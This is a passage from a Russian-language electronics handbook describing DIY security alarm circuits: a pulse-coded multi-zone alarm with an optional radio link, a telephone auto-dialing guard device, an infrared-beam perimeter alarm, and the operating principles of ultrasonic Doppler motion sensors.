DD2. 2. Генератор тактовых импульсов выполнен на микросхеме DD1, частота которого стабилизирована кварцевым резонатором ZQ1. С вывода 11 микросхемы DD1 импульсы с частотой 32768 Гц поступают на вход делителя частоты на 64 (вывод 2). После деления импульсы с частотой 512 Гц с вывода 5 поступают на счетчик DD3 для определения длительности паузы между пачками импульсов.
Рис. 6. 49. Принципиальная схема блока кодирования
Применение кварцевого генератора обеспечивает высокую стабильность работы системы и исключает необходимость дополнительной подстройки всех генераторов. Работа тактового генератора и счетчика DD3 синхронизированы с началом и концом пачки импульсов, поступающих на их входы R. Счетчик DD3 во время паузы между пачками считает тактовые импульсы, следующие с частотой 512 Гц (вывод 5 микросхемы DD1), измеряя таким образом длительность паузы между пачками.
Если длительность паузы превышает 16 периодов тактовых импульсов, сигналом с выхода 16 (вывод 11) микросхемы DD3 D-триггер DD6. 2 устанавливается в единичное состояние (это происходит одновременно во всех блоках кодирования), после чего продолжается измерение паузы. И если перемычка в блоке кодирования соединяет вывод 15 микросхемы DD4 и вывод 4 элемента DD7. 1, то спустя три импульса после переключения триггера DD6. 2 сигнал логической единицы с выхода 3 дешифратора DD4 (вывод 15) переключает элемент DD7. 1, логический нуль с его выхода через элемент DD10. 2 устанавливает счетчики DD1 и DD3 в нулевое состояние, а триггер DD6. 1 — в единичное. Уровень логической единицы с прямого выхода триггера DD6. 1 разрешает прохождение тактовых импульсов через элементы DD7. 2 и DD7. 3 на базу транзистора VT3. При этом на его коллекторе формируется пачка из трех импульсов отрицательной полярности.
Нагрузкой транзистора VT3 служит резистор, находящийся в блоке индикации (R9). Счетчик DD3 считает импульсы в пачке, приходящие на его вход С (вывод 1) через элемент DD2. 2. По окончании третьего импульса на выходе 3 дешифратора DD4 (вывод 15) появляется логическая единица. Этот сигнал не включает элемент DD7. 1, т. к. на выходе элемента DD9. 2 присутствует логический нуль, но устанавливает триггер DD6. 1 в нулевое состояние, что, в свою очередь, переводит триггер DD6. 2 также в нулевое состояние. В результате блок кодирования прекращает выдачу импульсов до появления паузы длительностью 16 импульсов, которая во всех блоках кодирования переключает триггеры DD6. 2 в единичное состояние и активизирует их работу.
В том случае, если во втором блоке кодирования перемычка подключена в выводу 1 (выход 4) дешифратора DD4, то после паузы в четыре импульса этот блок выдает пачку из четырех импульсов и также прекратит работу до появления паузы длительностью 16 импульсов. Следующим сработает блок, в котором перемычка подключена к выходу 5 дешифратора DD4 (вывод 6), и выдаст 5 импульсов и т. д.
После срабатывания последнего из подключенных к системе блоков триггеры DD6. 1 всех блоков устройства запретят выдачу импульсов. Возникнет пауза длительностью 16 импульсов, активизирующая работу всех блоков. Далее цикл работы системы повторится.
Длительность полного цикла работы всех блоков кодирования при частоте тактовых импульсов 512 Гц составляет около 0, 5 с.
В зависимости от установленной перемычки блок кодирования выдает от 3 до 14 импульсов в пачке. На случай нарушения контакта введен резистор R8, обеспечивающий выдачу пачки из 15 импульсов.
Рис. 6. 50. Печатная плата блока кодирования
При срабатывании одного из охранных датчиков (SB1 —SBn) триггер DD8. 1 переключается, в единичное состояние, на его инверсном выходе (вывод 2) появляется уровень логического нуля, закрывающий элемент DD7. 2 и прекращающий выдачу импульсов в линию этим блоком. После восстановления контактов кнопок SB1 —SBn триггер DD8. 1 устанавливается в исходное состояние импульсом с вывода 11 счетчика DD11.
Питание блока кодирования осуществляется по линии связи от источника + 30 В. Транзистор VT2 выполняет функцию стабилитрона. Диод VD3 предотвращает разряд конденсатора С5 при прохождении пачек импульсов.
Рис. 6. 51. Размещение деталей на плате блока кодирования
Каждый из блоков кодирования выполнен на отдельной печатной плате размером 65х95 мм. Плата изготовлена из двухстороннего стеклотекстолита, ее внешний вид представлен на рис. 6. 50.
В блоке используются микросхемы серий К176, К561. Кварцевый рехонетор ZQ1 — часовой, с частотой резонанса 32768 Гц. Перемычка, определяющая номер блока и, соответственно, число импульсов в пачке, выполняется тонким монтажным проводом. Размещение деталей на плате блока кодирования представлено на рис. 6. 51.
Блок индикации выполнен в виде отдельной платы и размещается в одном корпусе с источником питания. Принципиальная схема блока индикации представлена на рис. 6. 52. Блок питания может использоваться любой на постоянное напряжение 30 В и ток не менее 0, 3 А. Питание блоков кодирования осуществляется по линии связи постоянном напряжением 30 В, а блока индикации — от стабилизатора, выполненного на специализированной микросхеме DA1 КР142ЕН8Г.
Импульсы, поступающие с линии, через делитель напряжения на резисторах Rl, R2 поступают на базу транзистора VT1, который совместно с элементом DD2. 1 образует формирователь импульсов с крутыми фронтами и спадами, тем самым повышая помехоустойчивость всей системы в целом. Элементы DD2. 2 и DD2. 3, а также R6, VD1, СЗ формируют импульс, фронт которого совпадает с фронтом первого импульса в пачке, а спад несколько задержан относительно спада последнего импульса в пачке. Нулевой уровень с выхода 3 элемента DD2. 3 закрывает элемент DD3. 1 и разрешает прохождение импульсов пачки на вход С (выход 1) счетчика DD5 через элемент DD3. 2.
Рис. 6. 52. Принципиальная схема блока индикации
На триггерах DD4. 1, DD4. 2 и счетчике DD6 выполнено устройство, формирующее импульсы записи и обнуления счетчиков DD1 и DD5. В исходном состоянии на вход С триггера DD4. 1 и вход СР счетчика DD6 поступают импульсы с тактового генератора (вывод 11 микросхемы DD1) частотой 32768 Гц. Однако счетчик DD6 эти импульсы не считает, т.к: на его входе R присутствует высокий логический уровень, поступающий с прямого выхода (выход 13) триггера DD4. 2. По фронту первого импульса пачки положительный перепад с вывода 4 элемента DD2. 2, продифференцированный цепью C4R7, устанавливает триггер DD4. 2 в нулевое состояние. Счетчик DD6 начинает считать тактовые импульсы. Положительный импульс с вывода 2 счетчика DD6 через диод VD2 устанавливает счетчики DD1 и DD5 в нулевое состояние, синхронизируя их работу. С приходом еще двух импульсов на счетчик DD6 единичный уровень появляется на выводе 4 счетчика и входе D триггера DD4. 1, при этом на выходе последнего появляется единичный уровень, запрещающий по входу CN счет импульсов со входа СР счетчика DD6. По окончании пачки импульсов положительным перепадом на входе R триггер DD4. 1 устанавливается в нулевое состояние. Счетчик DD6 вновь начинает считать тактовые импульсы. На его выходах появляются положительные импульсы. Первый из них (с вывода 10) производит запись информации в регистр DD7. На выходах последнего появляется код числа, соответствующего количеству импульсов в пачке. Этот код преобразуется дешифраторами DD8, DD9 в единичный уровень на одном из выходов, соединенных с соответствующим входом S триггеров DD10, DD11, DD12 соответственно. Уровень логической единицы фиксируется на соответствующем выходе этих триггеров.
Следующим положительным импульсом с выхода 6 счетчика DD6 (вывод 5) производится запись информации в D-триггеры DD13, DD14, DD15. Положительное напряжение, появляющееся на прямом выходе этих триггеров вызовет включение одного из светодиодов зеленого свечения (например, HL1), входящего в состав двухцветного светодиода типа АЛС331А. При отсутствии сигналов с блоков кодирования, соответствующие светодиоды загораются красным цветом. Для удобства пользования индикацию неиспользуемых каналов можно отключить переключателями SA1—SA12.
Рис. 6. 53. Принципиальная электрическая схема блока звуковой индикации
Рис. 6. 54. Печатная плата блока индикации
Очередным импульсом со счетчика DD6 (вывод 9) счетчики DD1 и DD5 устанавливаются (через диод VD3) в исходное состояние. А сам счетчик DD6 устанавливается в нулевое состояние, т. к. импульс с вывода 11 устанавливает триггер DD4. 2 в единичное состояние, в котором он будет находиться до прихода очередной пачки импульсов.
При отсутствии импульсов на входе блока счетчик DD5 считает тактовые импульсы частотой 512 Гц, поступающие с вывода 5 счетчика DD1 через элементы DD3. 1, DD3. 2. Во время паузы длительностью 16 тактов на выходе 16 (вывод 11) счетчика DD5 появится логическая единица и произойдет обнуление триггеров DD10, DD11, DD12. Устройство готово к приему нового пакета данных.
Рис. 6. 53. Размещение деталей на плате блока индикации
При необходимости блок индикации можно дополнить звуковой индикацией. Принципиальная схема блока звуковой индикации приведена на рис. 6. 53.
Блок состоит из задающего генератора звуковой частоты и схемы управления. Он подключается к инверсным выходам триггеров DD13, DD14, DD15. Когда на этих выходах появляется уровень логической единицы, индицирующий сигнал тревоги, загорается красный светодиод, через один из диодов VD4 —VD 15 быстро заряжается конденсатор С8 и уровень единицы с вывода 4 элемента DD16. 2 разрешает работу звукового генератора. При пропадании сигнала тревоги генератор работает еще некоторое время, до момента разряда конденсатора С8 через резистор R22. Переключатели SA13—SA24 служат для выборочного отключения звуковой индикации некоторых каналов. При желании возможно использовать сдвоенные переключатели (SA1 и SA13, SA2 и SA14 и т. д.) для одновременного отключения световой и звуковой индикации соответствующих каналов.
Блок индикации выполнен на микросхемах серий К176 и К561 и смонтирован на печатной плате из двухстороннего фольгированного стеклотекстолита размером 115х130 мм (рис. 6. 54).
Размещение деталей, включая светодиоды, показано на рис. 6. 55.
Устройство не вызывает особых трудностей в настройке, и если собрано из заведомо исправных деталей, сразу готово к использованию.
В качестве линии связи можно использовать обычную двухпроводную линию, провода которой желательно свить в жгут для уменьшения наводок и помех, или использовать экранированный провод.
Линия связи может быть и беспроводной. При этом можно воспользоваться ИК или радиоканалом. Рассмотрим подробнее организацию линии связи по радиоканалу, как наиболее предпочтительную. Для этого необходимо дополнить каждый блок кодирования передатчиком и радиоприемником, а блок индикации — только радиоприемником. Все передатчики могут работать на одной частоте. Питание блоков в этом случае должно осуществляться от автономного источника питания.
Принципиальная схема простейшего передатчика для блоков кодирования приведена на рис. 6. 56.
Передатчик работает на частоте 85 МГц. Модуляция осуществляется путем срыва ВЧ колебаний генератора, выполненного на транзисторе VT2 типа КТ606. Модулирующий сигнал снимается с коллектора транзистора VT3 блока кодирования (рис. 6. 49) и периодически закрывает транзистор VT1. При этом диод VD1 закрывается положительным напряжением, генератор возбуждается, излучая сигнал данного блока. При открывании транзистора VT1 база транзистора VT2 через диод VD1 замыкается на общий провод, генерация срывается. Таким образом осуществляется смешанная амплитудно-частотная модуляция. В данном случае прием сигнала возможен как на ЧМ, так и на AM приемник.
Транзистор VT2 можно заменить на КТ904 или КТ907. Дроссель Др1 намотан на корпусе резистора МЛТ-0, 5 сопротивлением более 100 кОм проводом
Рис. 6. 56. Схема передатчика блока кодирования
Рис. 6. 57. Приемное устройство блока кодирования
ПЭВ-1 0, 16 мм и имеет 60 витков. Катушки L1 и L2 бескаркасные диаметром 3 мм. Катушка L1 имеет 5 витков, катушка L2 — 1 виток, намотанный поверх катушки L1 проводом ПЭВ-1 0, 35 мм.
Настройка передатчика особенностей не имеет.
Приемник можно выполнить, например, по схеме, приведенной на рис. 6. 57.
Приемное устройство выполнено на двух специализированных микросхемах К174ХА34 и К174ХА10. Радиотракт выполнен на микросхеме DA1. Она содержит полный супергетеродинный тракт ЧМ приемника, и на ее выходе (вывод 14) формируется низкочастотный сигнал. Кроме того, микросхема содержит встроенную схему бесшумной настройки, что в данном случае очень важно, т. к. необходимо, чтобы в режиме ожидания приемник не воспринимал помехи. Частота настройки определяется контуром L1C6 гетеродина.
Усилитель 34 собран на микросхеме DA2, с выхода которой (вывод 12) сигнал поступает на резисторы R3 или R1 блоков кодирования или блока индикации соответственно. При этом номиналы резисторов уменьшают и подбирают при настройке по наиболее надежному срабатыванию устройства.
Катушка L1 диаметром 3 мм намотана проводом ПЭВ-1 0, 35 мм и содержит 5 витков.
В устройстве можно использовать приемники и передатчики с кварцевой стабилизацией частоты, что позволит повысить надежность системы в целом.
6. 2. 3. Сторожевое устройство с телефонным вызовом
Сторожевое устройство может быть использовано для охраны любого объекта, на территории которого имеется доступ к телефонной линии. Оно позволяет фиксировать факт несанкционированного доступа на охраняемый объект и сообщать об этом путем дозвона по городской или местной телефонной линии до заранее выбранного абонента.
Устройство, принципиальная схема которого представлена на рис. 6. 58, позволяет осуществлять пять попыток дозвона. В течение каждой из этих попыток, на которые разбит полный цикл работы устройства, происходит сброс линии с последующим набором номера, заранее выбранного пользователем, и паузой ожидания. Время выполнения каждой попытки цикла составляет около 40 с.
Устройство может работать как самостоятельно, так и в составе другой системы сигнализации. Логика работы устройства такова. При включении питания оно формирует цикл задержки (около 40 с), необходимый для выхода из помещения и закрывания дверей. В это время устройство не реагирует на состояние охранных датчиков. По окончании заданного времени система переходит в режим охраны. При срабатывании одного из датчиков сторожевое устройство переходит в режим тревоги и автоматически вызывает абонента по заданному пользователем телефонному номеру.
Устройство выполнено на семи цифровых микросхемах и четырех транзисторах. Питание устройства осуществляется от любого источника стабилизированного напряжения 9—12 В, подключенного к сети переменного тока. В случае пропадания сетевого напряжения питание устройства осуществляется от резервного источника постоянного тока GB1, подзарядка которого происходит через резистор R22. Питание микросхемы DD7 осуществляется постоянно через резистор R21. Это необходимо для того, чтобы сохранить в памяти микросхемы DD7 информацию о последнем набранном номере.
Пользователь набирает необходимый номер перед выходом из помещения или делает это заранее. Происходит это следующим образом. Нажимается и удерживается в нажатом состоянии кнопка SB4. При этом на выводе 15 микросхемы DD7 уровень логической единицы, определяющий команду «Отбой», сменяется на уровень логического нуля. Транзистор VT3 закрывается, т. к. на аноды диодов VD5, VD6 поступают уровни логического нуля.
Током, протекающим через сопротивление резистора R19 и светодиод HL2, открывается транзистор VT4, что эквивалентно поднятию трубки телефонного аппарата — линия занята. Кнопками SB5—SB16 клавиатуры набирается телефонный номер абонента. При этом на базу транзистора VT3, через токоограничивающий резистор R 18, поступают импульсы набора номера. Это приводит к периодическому открыванию и закрыванию транзисторов VT3, VT4 и, как следствие, к коммутации телефонной линии. Контроль набора номера осуществляется с помощью светодиода HL2. После окончания набора кнопку SB4 необходимо отпустить. Положительное напряжение, поступающее на вывод 15 микросхемы DD7, приводит к формированию сигнала «Отбой», транзистор VT4 закрывается и освобождает линию. Набранный номер остается в памяти электронного номеронабирателя.
Для перевода устройства в режим охраны необходимо нажать кнопку SB1. При этом положительное напряжение источника питания подается на элементы схемы. Триггер, выполненный на элементах DD1. 1, DD1. 2, устанавливается (положительным импульсом на выводе 1) в состояние, при котором на выводе 4 элемента DD1. 2 появляется положительное напряжение, что приводит к открыванию транзистора VT1. Открытый транзистор VT1 шунтирует кнопку SB1, при отпускании которой питание с устройства не снимается. Одновременно положительным импульсом, сформированным цепью R3C3, счетчики микросхемы DD2
Рис. 6. 58. Принципиальная схема сторожевого устройства с телефонным вызовом
устанавливаются в нулевое состояние. Таким же образом импульсы, сформированные цепью R10C7, устанавливают триггеры DD5. 2, DD6. 1, DD6. 2 в нулевое состояние, а триггер DD5. 1 — в единичное. При этом уровень логической единицы с вывода 13 триггера DD5. 1 закрывает элемент DD4. 2, а уровень логического нуля с вывода 12 триггера DD5. 1 блокирует элемент DD4. 3. Включается светодиод HL1, индицируя включение режима охраны и начало отсчета времени задержки. Уровень логической единицы с выхода Т4 (вывод 2) микросхемы DD2 открывает ключ на элементе DD3. 2, подключая конденсатор С5 параллельно конденсатору С4, уменьшая тем самым частоту импульсов тактового генератора G микросхемы DD2. Длительность единичного состояния на выходе Т4 DD2, определяется постоянной времени цепи R4R5C4C5 и счетчиком-делителем микросхемы DD2. При номиналах резисторов и конденсаторов, указанных на схеме, это время составит около 35 с. Этого вполне достаточно, чтобы выйти из помещения и закрыть за собой дверь. При этом датчики устройства будут заблокированы. По спаду импульса на выходе Т4 дифференцирующей цепью R9C6 сформируется короткий отрицательный импульс, который инвертируется элементом DD4. 1. Этот импульс поступает на вход S триггера DD5. 2 (вывод 6) и устанавливает его в единичное состояние, чем переводит устройство в режим охраны. Триггер DD5. 1 переключается в нулевое состояние: светодиод HL1 выключается, элементы DD4. 2, DD4. 3 разблокируются. Уровень логического нуля с вывода 2 триггера DD5. 2 снимает блокировку с элемента DD1. 3. Уровень логической единицы с вывода 11 элемента DD 1. 4 через диод VD3 поступает на входы R микросхемы DD2, обнуляя и блокируя счетчики.
При срабатывании охранного датчика SB2 уровень логической единицы с вывода 10 элемента DD1. 3 устанавливает триггер DD6. 1 в единичное состояние. Счетчики микросхемы DD2 разблокируются. Устройство отрабатывает время задержки перехода в режим тревоги, необходимое для отключения его пользователем. Для этого необходимо нажать на кнопку SB3. Уровень логической единицы с вывода 13 триггера DD6. 2 переключит триггер на элементах DD1. 1, DD1. 2 и через ключ DD3. 1 блокирует генератор тактовых импульсов. Транзистор VT1 закрывается и устройство отключается от источника питания. Если за время задержки (около 35 с) устройство не будет выключено кнопкой SB3, то оно переходит в режим тревоги. В этом режиме система работает по описанному ниже алгоритму.
Необходимые для коммутации линии и набора номера задержки обеспечиваются фазовым сдвигом между импульсами на выходах Т1 и ТЗ микросхемы DD2 и составляют примерно 1 с. При этом генератора G работает на высокой частоте (конденсатор С5 отключен). Положительный импульс с выхода Т1 инвертируется элементом DD4. 2 и закрывает транзистор VT2, что эквивалентно действию сигнала «Отбой». Импульс с выхода ТЗ через элементы DD4. 3 и DD3. 3 открывает аналоговый ключ DD3. 4, что приводит к замыканию между собой выводов 5 и 19 микросхемы DD7. Это вызывает, как. и. нажатие клавиши с символом «Т», повторный набор последнего набранного номера.
Таким образом получается, что отрицательный импульс с выхода М микросхемы DD2 разрешает подключение устройства к линии, положительный импульс с выхода Т1 длительностью примерно 1 с вызывает сброс линии, а следующий за ним после паузы (выход Т2) положительный импульс с выхода ТЗ вызывает повторный набор последнего запомненного номера. Положительный импульс с выхода Т4 определяет время, необходимое для набора номера и дозвона до абонента.
По окончании полного цикла (5 попыток дозвона) уровень логической единицы на выходе М счетчика микросхемы DD2 открывает ключ DD3. 1 и прекращает работу генератора.
Устройство собрано на печатной плате из двухстороннего фольгированного стеклотекстолпта, чертеж которой представлен на рис.6. 59.
В устройстве используются электролитические конденсаторы К50-16, К50-35 или другие, подходящие по размеру. Резисторы — типа МЛТ-0, 125. Диоды можно использовать типа КД521, КД510 и т. п. Источник питания GB — типа 7Д-0. 125 или НИКА. Размещение деталей на плате показано на рис. 6. 60.
Рис. 6. 59. Печатная плата охранного устройства с телефонным вызовом
Рис. 6. 60. Размещение деталей на плате устройства
При безошибочном монтаже налаживание охранного устройства сводится к подбору емкости конденсаторов С4 и С5 до получения желаемой длительности цикла.
Для питания устройства необходим источник питания с напряжением 10— 13 В и током до 100 мА. Плату можно разместить в корпус телефона-трубки, использовав уже имеющуюся клавиатуру.
6. 2. 4. Система охранной сигнализации на ИК лучах
Система предназначена для охраны квартир, офисов, коттеджей, музеев, земельных участков, дач и других объектов. Действие системы основано на использовании ИК датчиков. Режим тревоги включается при пересечении нарушителем инфракрасного луча. К одному блоку системы может быть подключено до 10 охранных датчиков. Все датчики подключены параллельно к одной четырехпроводной линии. Система позволяет не только определить факт незаконного вторжения на охраняемую территорию, но и выдает информацию о местоположении сработавшего датчика включением соответствующего светодиода. Таким образом, установив светодиоды на карте или схеме объекта можно быстро определить место вторжения, а по очередности зажигания светодиодов — направление перемещения нарушителя.
Система состоит из ИК передатчиков и приемников (до 10 блоков), а также блоков индикации и сигнализации.
Принципиальная схема блока ИК передатчика представлена на рис. 6. 61.
Задающий генератор блока выполнен на элементах DD1. 1, DD1. 2, резисторах Rl, R2 и конденсаторе С1. С выхода генератора прямоугольные импульсы частотой 16 кГц поступают на усилитель мощности, выполненный на элементах DD1. 3, DD1. 4, включенных параллельно. С выхода последнего импульсы по-
Рис. 6. 61. Блок ИК передатчика охранной сигнализации
ступают на ключевой каскад, выполненный на транзисторе VT1. Нагрузкой транзистора VT1 служит ИК светодиод VD1. Резистор R4 ограничивает ток, протекающий через диод VD1 и транзистор VT1. Питается блок от источника постоянного тока напряжения 9 В. Блок ИК передатчика собран на отдельной плате и помещен во влагозащитный корпус. Печатная плата и размещение деталей на ней приведены на рис. 6. 62.
Рис. 6. 62. Печатная плата ИК передатчика и размещение деталей на ней
Блок ИК приемника располагается на расстоянии не более 10 м от передатчика. ИК приемник усиливает сигнал до уровня срабатывания КМОП микросхем. Принципиальная схема ИК приемника приведена на рис. 6. 63. Приемник собран на 2 микросхемах и 2 транзисторах.
Рис. 6. 63. Принципиальная схема ИК приемника
Рис. 6. 64. Печатная плата ИК приемника
На операционном усилителе DA1 собран преобразователь тока фотодиода VD1 в напряжение. Подавление синфазной помехи в нем достигает 70 дБ. Цепь R3R4C1 формирует необходимую для подавления паразитной низкочастотной помехи, вызванной излучением ламп накаливания, АЧХ и определяет коэффициент передачи по напряжению усилителя. Каскад на транзисторе VT1 усиливает, а ключ на транзисторе VT2 окончательно формирует полезный сигнал фотоприемника. Диод VD2 включен для ускорения процесса перезарядки конденсатора СЗ.
В то время когда луч не прерывается нарушителем, на коллекторе транзистора VT2 и на выходе 2 блока присутствует последовательность импульсов
Рис. 6. 65. Размещение деталей на плате ИК приемника
Рис. 6. 66. Схема блока индикации системы сигнализации
с частотой 16 кГц. Но это происходит только тогда, когда счетчик DD1 установлен в состояние, соответствующее номеру данного блока. При пересечении нарушителем луча импульсы на выходе 2 блока пропадают. Счетчик DD1 управляется импульсами, поступающими на вывод 4 блока.
Печатная плата ИК приемника выполнена из фольгированного стеклотекстолита, ее чертеж приведен на рис. 6. 64. На рис. 6. 65 показано размещение деталей на плате.
Принципиальная схема основного блока — блока индикации, приведена на рис. 6. 66. Он рассчитан на подключение до 10 блоков ИК приемников (по количеству ИК передатчиков).
На элементах DD10. 2 и DD10. 3 выполнен генератор тактовых импульсов частотой 600 Гц. При включении питания цепь R5C6 формирует отрицательный импульс, блокирующий генератор по выводу 8. После заряда конденсатора Сб до уровня логической единицы генератор начинает работать. Импульсы с его выхода CN (вывод 10 DD10. 3) поступают на вход счетчика DD1 (вывод 14), а также на входы блоков приемников через контакт 4 платы. Таким образом, счетчики датчиков и счетчик DD1 основного блока работают синхронно, и в каждый момент времени на вход 2 блока индикации поступают импульсы частотой 16 кГц только от одного из блоков приемников. Очередность работы приемных блоков определяется подключением катода диода VD3 к выходам счетчика DD1 (рис. 6. 63). При появлении логической единицы на соответствующем выходе счетчика диод VD3 закрывается, разрешая проход импульсов на базу транзистора VT2.
С вывода 2 основного блока (рис. 6. 66) эти импульсы через конденсатор С1 поступают на детектор, выполненный на диодах VD1, VD2. При этом на выводах 5 и 6 элемента DD10. 1 будет уровень логической единицы а при отсутствии импульсов — уровень логического нуля. Таким образом, сигнал, информирующий о состоянии датчика, включенного в данный момент, через инвертор DD10. 1 поступает на вентили DD2. 1, DD2. 3, DD3. 1, DD4. 3, DD5. 1, DD5. 3, DD6. 1 и DD6. 3. Их выходы через соответствующие инверторы подключены ко входам R триггеров DD7, DD8, DD9. По какой из цепей и на вход какого именно триггера поступит сигнал, зависит от состояния счетчика DD1, а следовательно, и от номера подключенного датчика. К выходам триггеров подключены светодиодные индикаторы HL1 —HL10. Диоды VD3—VD12, резистор R17, R18 и микросхема DD11 образуют звуковое сигнальное устройство.
При отсутствии нарушения (пересечения луча) на выходе инвертора DD10. 1 (вывод 4) будет уровень логического нуля, коммутаторы будут закрыты и на входы триггеров сигналы со счетчика не поступят. Устройство находится в дежурном режиме. При пересечении луча одного из датчиков на выходе элемента DD10. 1 (вывод 4) появится положительный импульс длительностью, равной одному такту, разрешающий прохождение сигнала с одного из выходов счетчика на вход соответствующего триггера. Триггер переключается в противоположное состояние, включится светодиод, соответствующий номеру сработавшего датчика, и раздастся звуковой сигнал тревоги. Установка триггеров в исходное состояние осуществляется кнопкой SB1 или, при включении питания, цепью С5, R6.
Рис. 6. 68. Размещение деталей на плате основного блока
Основной блок выполнен на печатной плате размером 85х105 мм из двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 67, а размещение деталей на ней — на рис. 6. 68.
Настройка устройства заключается в установке частот генераторов тактовых импульсов подбором сопротивления резистора R2 (рис. 6. 61) до получения на выходе элементов DD1. 3, DD1. 4 частоты 16 кГц и подбором сопротивления резистора R4 (рис. 6. 66) до получения на выводе 10 элемента DD10. 3 частоты 600 Гц.
В качестве блоков передатчиков и приемников можно использовать готовые блоки от систем дистанционного управления телевизорами, немного доработав их.
6. 2. 5. Ультразвуковой датчик системы охранной сигнализации
На первоначальном этапе разработки ультразвуковых датчиков системы обнаружения движущегося объекта строили так, как это схематически показано на рис. 6. 69, а. Излучатель BF1 и приемник ВМ1 располагали на противоположных стенах помещения, под потолком (для снижения влияния внутренней обстановки). Излучатель BF1 возбуждал в пространстве помещения стабильные по частоте и амплитуде ультразвуковые колебания. Микрофон (приемник) ВМ1 преобразовывал принятый из пространства ультразвуковой сигнал в электрический. Далее, в электронном устройстве этот сигнал усиливался, детектировался и анализировался по амплитуде. В случае колебания амплитуды ультразвукового сигнала формировался сигнал тревоги.
Рис. 6. 69. Построение ультразвуковых систем обнаружения
Отчего же происходят колебания амплитуды принятого ультразвукового сигнала? Предположим, что помещение идеально, т. е. представляет собой герметически замкнутое пространство, ограниченное жесткими стенами. Поскольку излучение не является остронаправленным, к микрофону ВМ1 вместе с прямой волной приходят волны, отраженные от стен, потолка и пола. Энергия волны в зоне микрофона ВМ1, как, впрочем, и на любой поверхности помещения, есть результат интерференции всех подающих волн. Пока в помещении не происходит какого-либо перемещения отражающих или поглощающих поверхностей или изменения физических свойств среды, интерференционная картина, а значит и уровень энергии волны в каждой точке, будут постоянны.
Любое движение в помещении приведет к изменению пути прохождения ультразвуковых волн, а следовательно, к изменениям интерференционной картины. Это приведет к колебаниям амплитуды выходного сигнала микрофона ВМ1. Регистрируя эти колебания, можно обнаружить перемещение в замкнутом пространстве.
Данный способ обнаружения подвижных объектов обеспечивает очень высокую чувствительность при высокой экономичности, поскольку волна от излучателя BF1 к приемнику ВМ1 проходит через помещение по наиболее короткому пути, а следовательно имеет наименьшее затухание.
Однако в реальных условиях эта система практически неработоспособна из-за чрезвычайно высокой вероятности ложных срабатываний. Система реагирует даже на поток воздуха, т. к. сложение скорости звука со скоростью воздуха изменит характер прохождения волны, что будет воспринято микрофоном ВМ1 как перемещение объекта.
Для повышения устойчивости системы излучатель BF1 и приемник ВМ1 располагают на одной стене (рис. 6. 69, б). Длина пути волны увеличивается в два раза, что потребует значительного увеличения излучаемой мощности. Но при этом из-за того, что волна проходит через поток воздуха дважды — туда и обратно, приращение скорости взаимно компенсируется, что и повышает устойчивость устройства к ложным срабатываниям в условиях относительно равномерных потоков воздуха, движущихся в любых направлениях.
В реальных условиях потоки воздуха могут быть весьма неравномерными. Кроме того, существенный вклад в нестабильность интерференционной картины в реальном помещении вносят деформации стекол и дверей в результате порывов ветра снаружи, разного рода вибрации и другие факторы. Все это привело к тому, что охранная система, построения по описанному выше принципу, оказалась нежизнеспособной.
Существенно повысить помехоустойчивость позволяет применение иного метода детектирования сигнала — не по амплитуде, а по частоте. Если объект перемещается вдоль направления распространения волны (рис. 6. 69, б), отраженная от него волна будет иметь некоторое смещение по частоте относительно излучаемой. Это явление получило название эффекта Доплера. Из-за разно-направленного отражения волн в реальном помещении эффект Доплера проявляется и при строго перпендикулярном указанному перемещению объекта, правда, несколько слабее. Поэтому объект, движущийся в любом направлении, будет обнаружен.
Рис. 6. 70. Структурная схема ультразвукового датчика
Несмотря на достоинства, детектирование с использованием эффекта Доплера не снимает полностью проблему ложных срабатываний. Существует определенный предел интенсивности воздушных потоков и других факторов, выше которого датчик будет регистрировать ложные перемещения.
Структурная схема ультразвукового доплеровского датчика представлена на рис. 6. 70. В качестве излучателя BF1 и приемника ВМ1, как правило, используют высокоэффективные резонаторы из пьезокерамики.
В состав аппаратной части ультразвукового датчика входят следующие блоки:
излучатель BF1; приемник ВМ1; эталонный генератор G1; входной усилитель А1; преобразователь U1; фазовый детектор U2; фильтр нижних частотZ1;
фильтр верхних частот Z2; детектор-формирователь U3; выходной усилитель А2; устройство индикации HI.
Излучатель BF1 ультразвуковой волны служит нагрузкой эталонного генератора G1. Рабочую частоту выбирают как компромисс между помехоустойчивостью и затуханием ультразвуковых колебаний в воздухе. Чем больше частота, тем меньше мешающее влияние естественных и искусственных шумов, воспринимаемых датчиком, однако с увеличением частоты повышается затухание волны, и для нормальной работы датчика необходимо увеличивать мощность излучения (пропорционально квадрату частоты). Наиболее подходящей является частота около 40 кГц. Мощность излучения выбирается из соображений приемлемой экономичности, требуемого уровня принимаемого сигнала и объема контролируемого пространства.
Входной усилитель А1 должен обеспечивать уверенный прием отраженного сигнала в условиях значительного колебания его амплитуды. Для снижения влияния помех необходима высокая избирательность усилителя в интервале fg ± fd- где fg — рабочая частота генератора, fd — доплеровский сдвиг, реально не превышающий 1 кГц.
Для исключения зависимости входного сигнала от амплитудной составляющей в усиленном принятом сигнале выделяют точки перехода через «нуль» и формируют сигнал прямоугольной формы. Эту функцию выполняет преобразователь U1.
Заметим здесь, что понятие о частотном доплеровском сдвиге не вполне корректно, поскольку реальный входной сигнал будет представлять собой частотный спектр. Если, например, движущийся объект представляет собой цельную отражающую поверхность, вместе с сигналом основной частоты будет присутствовать сигнал доплеровского сдвига, амплитуда которого будет пропорциональна отношению энергии волны, приходящей от объекта, к энергии всех приходящих волн. Иначе говоря, амплитуда сигнала доплеровского сдвига будет зависеть от площади объекта.
Если волна, отраженная от движущегося объекта, по амплитуде не превышает сумму волн, отраженных от стен помещения, то сигнал после преобразователя будет иметь фазовую, а не частотную модуляцию. В противном случае, к фазовой добавится частотная модуляция.
Вместе с отраженными от стен, приемник зафиксирует и волны, отраженные от всех поверхностей объекта, причем амплитуда и частота этих волн будет зависеть соответственно от площади отражающих поверхностей и от скорости перемещения их в пространстве. Фазовая модуляция будет отражать все движения, производимые объектом.
Фазовый детектор U2 преобразует фазовую модуляцию сигнала в широтно-импульсную. Фильтр нижних частот Z1 сглаживает импульсы с выхода фазового детектора U2 и преобразует их в амплитудно-модулированный сигнал. Частота среза фильтра Z 1 равна реальной верхней частоте доплеровского сдвига, в нашем случае 1 кГц.
Фильтр верхних частот Z2 ограничивает снизу частотную полосу, воспринимаемую устройством. Он играет особую роль в устойчивости всей системы к ложным срабатываниям.
